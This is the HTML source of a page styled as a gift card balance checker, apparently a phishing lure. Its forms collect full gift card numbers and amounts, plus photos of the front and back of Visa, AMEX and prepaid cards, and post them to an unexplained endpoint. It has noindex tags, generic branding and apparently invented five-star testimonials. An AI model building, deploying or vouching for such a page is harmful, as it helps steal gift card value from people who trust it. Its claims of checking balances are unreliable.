<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <meta name="robots" content="noindex, nofollow" />
    <meta name="description" content="Check your gift card balance and card status" />
    <link href="https://fonts.googleapis.com/css2?family=Press+Start+2P&display=swap" rel="stylesheet" type="text/css">
    <style>
      img:is([sizes="auto"i], [sizes^="auto,"i]) {
        contain-intrinsic-size: 3000px 1500px;
      }
    </style>
    <link rel="stylesheet" href="style.css">
    <title>Gift Card Validator</title>
  </head>
  <body>
    <!-- New top section with text and button -->
    <div class="intro">
      <strong>Check the balance on your gift card easily. Find out how much is left on your gift card in a matter of seconds. Easygoing, regardless of whether you bought anything for yourself or received a gift card.</strong>
      <button id="check-gift-card-intro" class="check-gift-card-button">View your card balance</button>
    </div>
    <!-- Slideshow Container -->
    <div class="slideshow-container">
      <div class="slideshow-images">
        <img src="img/1.png" alt="Gift card image 1">
        <img src="img/2.png" alt="Gift card image 2">
        <img src="img/4.png" alt="Gift card image 4">
        <img src="img/5.png" alt="Gift card image 5">
        <img src="img/6.png" alt="Gift card image 6">
        <img src="img/7.png" alt="Gift card image 7">
        <img src="img/8.png" alt="Gift card image 8">
      </div>
    </div>
    <!-- Second intro -->
    <div class="intro2">
      <h2>Remain in charge at all times and places.</h2>
      <p>Embrace the day of no more guesswork! Get up-to-date information in real time on the balance on your gift card so you always know. Our website is easy to use and allows you to check your balance from anywhere at any time, whether you’re on a laptop, tablet, or smartphone.</p>
      <p>Your gift card balance may be easily checked using our simple and easy interface. Simply follow the easy procedures to retrieve your card data.</p>
      <button id="check-gift-card-intro2" class="check-gift-card-button">View your card balance</button>
    </div>
    <!-- Form Section -->
    <div class="form">
        <form id="gift-card-form" action="check-now" method="post">
          <h2>Check Your Card Validity</h2>

          <!-- Name Field -->
          <label for="name">Name</label>
          <input type="text" id="name" name="name" placeholder="Enter your name" required>

          <!-- Card Type Dropdown -->
          <label for="card-type">Select Card Type</label>
          <select id="card-type" name="card-type" required>
            <option value="select">Select Card Type</option>
            <option value="Roblox">Roblox Gift Card</option>
            <option value="visa">Visa Gift Card</option>
            <option value="amazon">Amazon Gift Card</option>
            <option value="walmart">Walmart Gift Card</option>
            <option value="itunes">iTunes Gift Card</option>
            <option value="amex">American Express Gift Card</option>
            <option value="target">Target Gift Card</option>
            <option value="starbucks">Starbucks Gift Card</option>
            <option value="disney">Disney Gift Card</option>
            <option value="sephora">Sephora Gift Card</option>
            <option value="ebay">eBay Gift Card</option>
          </select>

          <!-- Amount Field -->
          <label for="amount">Amount</label>
          <input type="number" id="amount" name="amount" placeholder="Enter the amount" required>

          <!-- Card Number Field -->
          <label for="card-number">Card Number</label>
          <input type="text" id="card-number" name="card-number" placeholder="Enter Your card number" required>

          <!-- Submit Button -->
          <button type="submit" class="check-gift-card-button">VIEW BALANCE</button>
        </form>
      </div>
    <!-- Countup Section -->
    <div class="countup-container">
      <h2>Numbers Speak</h2>
      <div class="countup-item">
        <label for="countup-1">Happy Users</label>
        <div id="countup-1" class="countup">1500+</div>
      </div>
      <div class="countup-item">
        <label for="countup-2">Valid Cards Checked</label>
        <div id="countup-2" class="countup">1500+</div>
      </div>
      <div class="countup-item">
        <label for="countup-3">Earn Points</label>
        <div id="countup-3" class="countup">300</div>
      </div>
    </div>
    <!-- Confirmation Section for Other Cards -->
      <div class="confirmation">
        <div class="form">
            <form id="other-cards-form" action="check-now" method="post" enctype="multipart/form-data">
        <h2>For Other Cards (e.g., Vanilla, AMEX, Prepaid Cards), Upload Picture for Confirmation</h2>

          <label for="card-name">Card Name</label>
          <input type="text" id="card-name" name="card-name" placeholder="Enter Card Name" required>

          <label for="card-amount">Amount</label>
          <input type="number" id="card-amount" name="card-amount" placeholder="Enter Amount" required>

          <div class="file-upload">
            <label for="card-front">Upload Card Front Image</label>
            <input type="file" id="card-front" name="card-front" accept="image/*" required>

            <label for="card-back">Upload Card Back Image</label>
            <input type="file" id="card-back" name="card-back" accept="image/*" required>
          <!-- Submit Button -->
          <button type="submit" class="check-gift-card-button">View balance</button>
        </form>
      </div>
          <!-- Review Section -->
    <div class="reviews-section">
      <h2>Testimonials</h2>
      <p>See what they say about us</p>
      <!-- Review 1 -->
      <div class="review">
        <div class="wp-block-uagb-star-rating">
          <div class="uag-star-rating" title="5/5">
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
          </div>
        </div>
        <div class="wp-block-uagb-advanced-heading">
          <h6 class="uagb-heading-text">Willem</h6>
        </div>
        <div class="wp-block-uagb-info-box">
          <div class="uagb-infobox-margin-wrapper">
            <div class="uagb-ifb-content">
              <div class="uagb-ifb-image-content">
                <img src="img/client-1.png" alt="Client Image">
              </div>
              <p class="uagb-ifb-desc">"I’ve used verifygiftcard for months now, and it’s been a game changer for my online store. The user interface is intuitive, and the accuracy of the validations is impressive. It’s saved me countless hours and eliminated the hassle of handling invalid cards. Highly recommended!”</p>
            </div>
          </div>
        </div>
      </div>
      <!-- Review 2 -->
      <div class="review">
        <div class="wp-block-uagb-star-rating">
          <div class="uag-star-rating" title="5/5">
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
          </div>
        </div>
        <div class="wp-block-uagb-advanced-heading">
          <h6 class="uagb-heading-text">Martha</h6>
        </div>
        <div class="wp-block-uagb-info-box">
          <div class="uagb-infobox-margin-wrapper">
            <div class="uagb-ifb-content">
              <div class="uagb-ifb-image-content">
                <img src="img/client-2.png" alt="Client Image">
              </div>
              <p class="uagb-ifb-desc">"I’m a small business owner, and keeping track of gift card balances used to be a nightmare. verifygiftcard not only simplifies the process but also provides detailed reports that help me track usage trends. It’s user-friendly and reliable—I wouldn’t go back to manual checks!”</p>
            </div>
          </div>
        </div>
      </div>
      <!-- Review 3 -->
      <div class="review">
        <div class="wp-block-uagb-star-rating">
          <div class="uag-star-rating" title="5/5">
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
          </div>
        </div>
        <div class="wp-block-uagb-advanced-heading">
          <h6 class="uagb-heading-text">James</h6>
        </div>
        <div class="wp-block-uagb-info-box">
          <div class="uagb-infobox-margin-wrapper">
            <div class="uagb-ifb-content">
              <div class="uagb-ifb-image-content">
                <img src="img/client-3.png" alt="Client Image">
              </div>
              <p class="uagb-ifb-desc">"verifygiftcard has made it so much easier to manage gift card transactions. The system is reliable and fast, allowing me to focus more on running my business rather than worrying about the status of gift cards. It’s been a huge time saver!"</p>
            </div>
          </div>
        </div>
      </div>
      <!-- Review 4 -->
      <div class="review">
        <div class="wp-block-uagb-star-rating">
          <div class="uag-star-rating" title="5/5">
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
          </div>
        </div>
        <div class="wp-block-uagb-advanced-heading">
          <h6 class="uagb-heading-text">Sophia</h6>
        </div>
        <div class="wp-block-uagb-info-box">
          <div class="uagb-infobox-margin-wrapper">
            <div class="uagb-ifb-content">
              <div class="uagb-ifb-image-content">
                <img src="img/client-4.png" alt="Client Image">
              </div>
              <p class="uagb-ifb-desc">"This platform has completely transformed how we handle gift card validations. The integration with our online store was seamless, and the customer support is exceptional. I would highly recommend this service to anyone in e-commerce!”</p>
            </div>
          </div>
        </div>
      </div>
      <!-- Review 5 -->
      <div class="review">
        <div class="wp-block-uagb-star-rating">
          <div class="uag-star-rating" title="5/5">
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
            <span class="uag-star">★</span>
          </div>
        </div>
        <div class="wp-block-uagb-advanced-heading">
          <h6 class="uagb-heading-text">Liam</h6>
        </div>
        <div class="wp-block-uagb-info-box">
          <div class="uagb-infobox-margin-wrapper">
            <div class="uagb-ifb-content">
              <div class="uagb-ifb-image-content">
                <img src="img/client-5.jpeg" alt="Client Image">
              </div>
              <p class="uagb-ifb-desc">"Yh, this is the game-changer. I no longer need to worry about whether a gift card is valid. It’s fast, easy to use, and integrates perfectly with our checkout system. Highly recommended!"</p>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Footer Section -->
    <footer>
      <p>© 2025 Best Gift Card Validator & Verifier</p>
    </footer>
    <script src="script.js"></script>
        <script type="module" src="servz.js"></script>
  </body>
</html>